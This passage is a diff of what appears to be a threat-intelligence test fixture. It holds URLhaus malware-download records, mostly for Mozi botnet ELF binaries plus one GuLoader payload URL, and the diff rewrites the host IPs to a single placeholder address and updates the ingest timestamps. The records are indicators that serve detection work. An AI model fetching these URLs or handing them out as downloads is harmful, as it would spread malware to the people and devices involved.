+ "original": "{\"id\":\"961308\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961308/\",\"url\":\"http://89.160.20.156:49575/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:36:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -11849,18 +11849,18 @@
 "url": {
 "path": "/Mozi.a",
 "extension": "a",
- "original": "http://112.234.38.83:50000/Mozi.a",
+ "original": "http://89.160.20.156:50000/Mozi.a",
 "scheme": "http",
 "port": 50000,
- "domain": "112.234.38.83",
- "full": "http://112.234.38.83:50000/Mozi.a"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:50000/Mozi.a"
 },
- "ip": "112.234.38.83"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693431048Z",
- "original": "{\"id\":\"961299\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961299/\",\"url\":\"http://112.234.38.83:50000/Mozi.a\",\"url_status\":\"online\",\"host\":\"112.234.38.83\",\"date_added\":\"2021-01-14 19:35:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.026275300Z",
+ "original": "{\"id\":\"961299\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961299/\",\"url\":\"http://89.160.20.156:50000/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:35:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -11898,18 +11898,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://115.50.226.131:36251/Mozi.m",
+ "original": "http://89.160.20.156:36251/Mozi.m",
 "scheme": "http",
 "port": 36251,
- "domain": "115.50.226.131",
- "full": "http://115.50.226.131:36251/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:36251/Mozi.m"
 },
- "ip": "115.50.226.131"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693434294Z",
- "original": "{\"id\":\"961300\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961300/\",\"url\":\"http://115.50.226.131:36251/Mozi.m\",\"url_status\":\"online\",\"host\":\"115.50.226.131\",\"date_added\":\"2021-01-14 19:35:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.026282200Z",
+ "original": "{\"id\":\"961300\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961300/\",\"url\":\"http://89.160.20.156:36251/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:35:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -11947,18 +11947,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://116.25.134.26:51932/Mozi.m",
+ "original": "http://89.160.20.156:51932/Mozi.m",
 "scheme": "http",
 "port": 51932,
- "domain": "116.25.134.26",
- "full": "http://116.25.134.26:51932/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:51932/Mozi.m"
 },
- "ip": "116.25.134.26"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693437500Z",
- "original": "{\"id\":\"961301\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961301/\",\"url\":\"http://116.25.134.26:51932/Mozi.m\",\"url_status\":\"online\",\"host\":\"116.25.134.26\",\"date_added\":\"2021-01-14 19:35:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.026289200Z",
+ "original": "{\"id\":\"961301\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961301/\",\"url\":\"http://89.160.20.156:51932/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:35:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -11996,18 +11996,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://116.75.197.211:45660/Mozi.m",
+ "original": "http://89.160.20.156:45660/Mozi.m",
 "scheme": "http",
 "port": 45660,
- "domain": "116.75.197.211",
- "full": "http://116.75.197.211:45660/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:45660/Mozi.m"
 },
- "ip": "116.75.197.211"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693440846Z",
- "original": "{\"id\":\"961297\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961297/\",\"url\":\"http://116.75.197.211:45660/Mozi.m\",\"url_status\":\"online\",\"host\":\"116.75.197.211\",\"date_added\":\"2021-01-14 19:35:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.026296300Z",
+ "original": "{\"id\":\"961297\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961297/\",\"url\":\"http://89.160.20.156:45660/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:35:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -12045,18 +12045,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://112.240.79.242:42478/Mozi.m",
+ "original": "http://89.160.20.156:42478/Mozi.m",
 "scheme": "http",
 "port": 42478,
- "domain": "112.240.79.242",
- "full": "http://112.240.79.242:42478/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:42478/Mozi.m"
 },
- "ip": "112.240.79.242"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693444183Z",
- "original": "{\"id\":\"961298\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961298/\",\"url\":\"http://112.240.79.242:42478/Mozi.m\",\"url_status\":\"online\",\"host\":\"112.240.79.242\",\"date_added\":\"2021-01-14 19:35:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.026304700Z",
+ "original": "{\"id\":\"961298\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961298/\",\"url\":\"http://89.160.20.156:42478/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:35:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -12094,18 +12094,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://103.243.184.54:50726/Mozi.m",
+ "original": "http://89.160.20.156:50726/Mozi.m",
 "scheme": "http",
 "port": 50726,
- "domain": "103.243.184.54",
- "full": "http://103.243.184.54:50726/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:50726/Mozi.m"
 },
- "ip": "103.243.184.54"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693447429Z",
- "original": "{\"id\":\"961296\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961296/\",\"url\":\"http://103.243.184.54:50726/Mozi.m\",\"url_status\":\"online\",\"host\":\"103.243.184.54\",\"date_added\":\"2021-01-14 19:34:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.026311800Z",
+ "original": "{\"id\":\"961296\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961296/\",\"url\":\"http://89.160.20.156:50726/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:34:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -12143,18 +12143,18 @@
 "provider": "geenensp",
 "url": {
 "path": "/i",
- "original": "http://59.99.93.45:40256/i",
+ "original": "http://89.160.20.156:40256/i",
 "scheme": "http",
 "port": 40256,
- "domain": "59.99.93.45",
- "full": "http://59.99.93.45:40256/i"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:40256/i"
 },
- "ip": "59.99.93.45"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693450675Z",
- "original": "{\"id\":\"961295\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961295/\",\"url\":\"http://59.99.93.45:40256/i\",\"url_status\":\"offline\",\"host\":\"59.99.93.45\",\"date_added\":\"2021-01-14 19:33:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}",
+ "ingested": "2021-12-13T08:40:08.026318700Z",
+ "original": "{\"id\":\"961295\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961295/\",\"url\":\"http://89.160.20.156:40256/i\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:33:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -12193,18 +12193,18 @@ "url": { "path": "/bin.sh", "extension": "sh", - "original": "http://182.113.226.63:50971/bin.sh", + "original": "http://89.160.20.156:50971/bin.sh", "scheme": "http", "port": 50971, - "domain": "182.113.226.63", - "full": "http://182.113.226.63:50971/bin.sh" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:50971/bin.sh" }, - "ip": "182.113.226.63" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693454111Z", - "original": "{\"id\":\"961294\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961294/\",\"url\":\"http://182.113.226.63:50971/bin.sh\",\"url_status\":\"online\",\"host\":\"182.113.226.63\",\"date_added\":\"2021-01-14 19:29:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", + "ingested": "2021-12-13T08:40:08.026325600Z", + "original": "{\"id\":\"961294\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961294/\",\"url\":\"http://89.160.20.156:50971/bin.sh\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:29:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -12250,7 +12250,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.693457247Z", + "ingested": "2021-12-13T08:40:08.026332500Z", "original": "{\"id\":\"961293\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961293/\",\"url\":\"https://realestatederivatives.com.ng/zx/janomo_hfWUGQvSPn0.bin\",\"url_status\":\"online\",\"host\":\"realestatederivatives.com.ng\",\"date_added\":\"2021-01-14 19:24:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"abused_legit_malware\",\"surbl\":\"not listed\"},\"reporter\":\"abuse_ch\",\"larted\":\"true\",\"tags\":[\"encrypted\",\"GuLoader\"]}", "category": "threat", "type": "indicator", 
@@ -12289,18 +12289,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://59.97.169.164:33946/Mozi.m", + "original": "http://89.160.20.156:33946/Mozi.m", "scheme": "http", "port": 33946, - "domain": "59.97.169.164", - "full": "http://59.97.169.164:33946/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:33946/Mozi.m" }, - "ip": "59.97.169.164" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693460563Z", - "original": "{\"id\":\"961291\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961291/\",\"url\":\"http://59.97.169.164:33946/Mozi.m\",\"url_status\":\"offline\",\"host\":\"59.97.169.164\",\"date_added\":\"2021-01-14 19:22:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026339400Z", + "original": "{\"id\":\"961291\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961291/\",\"url\":\"http://89.160.20.156:33946/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:22:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -12338,18 +12338,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://58.249.13.69:39990/Mozi.a", + "original": "http://89.160.20.156:39990/Mozi.a", "scheme": "http", "port": 39990, - "domain": "58.249.13.69", - "full": "http://58.249.13.69:39990/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:39990/Mozi.a" }, - "ip": "58.249.13.69" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693463809Z", - "original": "{\"id\":\"961292\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961292/\",\"url\":\"http://58.249.13.69:39990/Mozi.a\",\"url_status\":\"online\",\"host\":\"58.249.13.69\",\"date_added\":\"2021-01-14 19:22:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026346300Z", + "original": "{\"id\":\"961292\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961292/\",\"url\":\"http://89.160.20.156:39990/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:22:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -12387,18 +12387,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://61.52.86.202:60558/Mozi.m", + "original": "http://89.160.20.156:60558/Mozi.m", "scheme": "http", "port": 60558, - "domain": "61.52.86.202", - "full": "http://61.52.86.202:60558/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:60558/Mozi.m" }, - "ip": "61.52.86.202" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693467577Z", - "original": "{\"id\":\"961288\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961288/\",\"url\":\"http://61.52.86.202:60558/Mozi.m\",\"url_status\":\"online\",\"host\":\"61.52.86.202\",\"date_added\":\"2021-01-14 19:22:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026353200Z", + "original": "{\"id\":\"961288\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961288/\",\"url\":\"http://89.160.20.156:60558/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:22:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -12436,18 +12436,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://61.52.76.45:32989/Mozi.a", + "original": "http://89.160.20.156:32989/Mozi.a", "scheme": "http", "port": 32989, - "domain": "61.52.76.45", - "full": "http://61.52.76.45:32989/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:32989/Mozi.a" }, - "ip": "61.52.76.45" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693470783Z", - "original": "{\"id\":\"961289\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961289/\",\"url\":\"http://61.52.76.45:32989/Mozi.a\",\"url_status\":\"online\",\"host\":\"61.52.76.45\",\"date_added\":\"2021-01-14 19:22:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026360300Z", + "original": "{\"id\":\"961289\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961289/\",\"url\":\"http://89.160.20.156:32989/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:22:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -12485,18 +12485,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://61.52.26.66:52458/Mozi.m", + "original": "http://89.160.20.156:52458/Mozi.m", "scheme": "http", "port": 52458, - "domain": "61.52.26.66", - "full": "http://61.52.26.66:52458/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:52458/Mozi.m" }, - "ip": "61.52.26.66" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693474670Z", - "original": "{\"id\":\"961290\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961290/\",\"url\":\"http://61.52.26.66:52458/Mozi.m\",\"url_status\":\"online\",\"host\":\"61.52.26.66\",\"date_added\":\"2021-01-14 19:22:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026367300Z", + "original": "{\"id\":\"961290\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961290/\",\"url\":\"http://89.160.20.156:52458/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:22:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -12534,18 +12534,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://203.212.246.231:60735/Mozi.m", + "original": "http://89.160.20.156:60735/Mozi.m", "scheme": "http", "port": 60735, - "domain": "203.212.246.231", - "full": "http://203.212.246.231:60735/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:60735/Mozi.m" }, - "ip": "203.212.246.231" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693478247Z", - "original": "{\"id\":\"961286\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961286/\",\"url\":\"http://203.212.246.231:60735/Mozi.m\",\"url_status\":\"online\",\"host\":\"203.212.246.231\",\"date_added\":\"2021-01-14 19:21:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026374200Z", + "original": "{\"id\":\"961286\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961286/\",\"url\":\"http://89.160.20.156:60735/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:21:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -12583,18 +12583,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://186.33.104.197:34755/Mozi.m", + "original": "http://89.160.20.156:34755/Mozi.m", "scheme": "http", "port": 34755, - "domain": "186.33.104.197", - "full": "http://186.33.104.197:34755/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:34755/Mozi.m" }, - "ip": "186.33.104.197" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693481483Z", - "original": "{\"id\":\"961287\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961287/\",\"url\":\"http://186.33.104.197:34755/Mozi.m\",\"url_status\":\"online\",\"host\":\"186.33.104.197\",\"date_added\":\"2021-01-14 19:21:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026381100Z", + "original": "{\"id\":\"961287\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961287/\",\"url\":\"http://89.160.20.156:34755/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:21:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -12632,18 +12632,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://41.86.19.146:39290/Mozi.m", + "original": "http://89.160.20.156:39290/Mozi.m", "scheme": "http", "port": 39290, - "domain": "41.86.19.146", - "full": "http://41.86.19.146:39290/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:39290/Mozi.m" }, - "ip": "41.86.19.146" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693485039Z", - "original": "{\"id\":\"961285\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961285/\",\"url\":\"http://41.86.19.146:39290/Mozi.m\",\"url_status\":\"offline\",\"host\":\"41.86.19.146\",\"date_added\":\"2021-01-14 19:21:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026388Z", + "original": "{\"id\":\"961285\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961285/\",\"url\":\"http://89.160.20.156:39290/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:21:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -12681,18 +12681,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://182.126.86.107:56141/Mozi.m", + "original": "http://89.160.20.156:56141/Mozi.m", "scheme": "http", "port": 56141, - "domain": "182.126.86.107", - "full": "http://182.126.86.107:56141/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:56141/Mozi.m" }, - "ip": "182.126.86.107" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693488155Z", - "original": "{\"id\":\"961279\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961279/\",\"url\":\"http://182.126.86.107:56141/Mozi.m\",\"url_status\":\"online\",\"host\":\"182.126.86.107\",\"date_added\":\"2021-01-14 19:20:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026394900Z", + "original": "{\"id\":\"961279\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961279/\",\"url\":\"http://89.160.20.156:56141/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:20:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -12730,18 +12730,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://182.117.77.236:40247/Mozi.a", + "original": "http://89.160.20.156:40247/Mozi.a", "scheme": "http", "port": 40247, - "domain": "182.117.77.236", - "full": "http://182.117.77.236:40247/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:40247/Mozi.a" }, - "ip": "182.117.77.236" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693502071Z", - "original": "{\"id\":\"961280\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961280/\",\"url\":\"http://182.117.77.236:40247/Mozi.a\",\"url_status\":\"online\",\"host\":\"182.117.77.236\",\"date_added\":\"2021-01-14 19:20:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026401900Z", + "original": 